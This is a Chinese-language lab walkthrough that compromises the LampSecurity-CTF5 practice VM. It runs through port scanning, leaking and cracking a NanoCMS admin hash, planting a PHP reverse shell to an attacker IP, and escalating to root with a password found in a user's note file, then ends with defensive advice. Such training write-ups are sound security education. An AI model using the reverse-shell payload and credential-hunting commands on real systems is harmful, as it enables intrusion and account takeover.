Vulnhub靶机实操笔记-LampSecurity-CTF5
字数 1284 2025-08-10 19:49:05
LampSecurity-CTF5 靶机渗透测试实战教程
一、环境准备与信息收集
1. 靶机信息
- 靶机名称: LampSecurity-CTF5
- 下载链接: Vulnhub LampSecurity-CTF5
- 网络配置: 桥接模式,IP地址为192.168.32.142
2. 攻击机准备
- Kali Linux 或其他渗透测试发行版
- 确保安装了以下工具:
- nmap
- hashcat
- searchsploit
- netcat
二、初始扫描与端口探测
1. 主机存活判断
sudo nmap -sn 192.168.32.0/24
2. 快速端口扫描
sudo nmap --min-rate 10000 -p- 192.168.32.142 -oA report/min-rate
参数说明:
--min-rate 10000: 以不低于10000包/秒的速度扫描-p-: 扫描所有端口(1-65535)-oA: 将结果输出为所有格式(.nmap, .gnmap, .xml)
3. TCP服务扫描
sudo nmap -sT -sV -O -p22,25,80,110,111,139,143,445,901,3306,52385 192.168.32.142
参数说明:
-sT: TCP连接扫描-sV: 服务版本探测-O: 操作系统探测-p: 指定端口扫描
4. UDP服务扫描
sudo nmap -sU -p22,25,80,110,111,139,143,445,901,3306,52385 192.168.32.142 -oA report/heavy-U
5. 漏洞脚本扫描
sudo nmap --script=vuln -p22,25,80,110,111,139,143,445,901,3306,52385 192.168.32.142
扫描结果显示存在SQL注入漏洞。
三、Web应用分析
1. NanoCMS识别
访问80端口发现系统为NanoCMS。
2. 漏洞搜索
searchsploit nanocms
发现存在RCE漏洞但需要认证。
3. 信息泄露漏洞利用
通过Google搜索发现NanoCMS存在信息泄露漏洞,访问特定路径可获取密码hash:
http://192.168.32.142/nano/admin/backup.php
获取到:
- 用户名: admin
- 密码hash:
9d2f75377ac0ab991d40c91fd27e52fd
4. Hash类型识别
hash-identifier '9d2f75377ac0ab991d40c91fd27e52fd'
结果显示最可能是MD5加密。
5. Hashcat破解
sudo hashcat -m 0 -a 0 9d2f75377ac0ab991d40c91fd27e52fd /usr/share/wordlists/rockyou.txt
参数说明:
-m 0: MD5 hash类型-a 0: 字典攻击模式
破解结果: 密码为shannon
6. 登录NanoCMS
使用凭证admin:shannon成功登录系统。
四、获取初始访问
1. 植入反向Shell
修改现有PHP页面内容为:
<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.32.131/1234 0>&1'");?>
2. 监听反弹Shell
在攻击机上:
nc -lvnp 1234
3. 访问修改后的页面获取Shell
五、权限提升
1. 系统信息收集
uname -a
查看系统内核版本等信息。
2. 检查sudo权限
sudo -l
3. 用户信息收集
cat /etc/passwd
4. 查找敏感信息
grep -R -i pass /home/* 2>/dev/null
发现文件:
/home/patrick/.tomboy/481bca0d-7206-45dd-a459-a72ea1131329.note
内容包含root密码: 50$cent
5. 获取交互式Shell
python -c "import pty;pty.spawn('/bin/sh')"
6. 切换root用户
su -
输入密码50$cent成功获取root权限。
六、总结与关键点
-
信息收集阶段:
- 全面扫描端口和服务
- 识别Web应用类型和版本
- 使用searchsploit查找已知漏洞
-
Web应用攻击:
- 利用信息泄露漏洞获取凭证hash
- 使用hashcat破解MD5 hash
- 通过认证后植入反向Shell
-
权限提升:
- 系统性地检查用户历史记录和配置文件
- 在用户目录中查找敏感信息
- 获取root密码后完成提权
-
关键工具使用:
- nmap进行主机发现和服务识别
- hashcat进行密码破解
- searchsploit查找公开漏洞
- netcat建立反向连接
-
防御建议:
- 避免使用弱密码和常见密码
- 及时更新CMS系统
- 限制敏感信息的存储位置
- 实施最小权限原则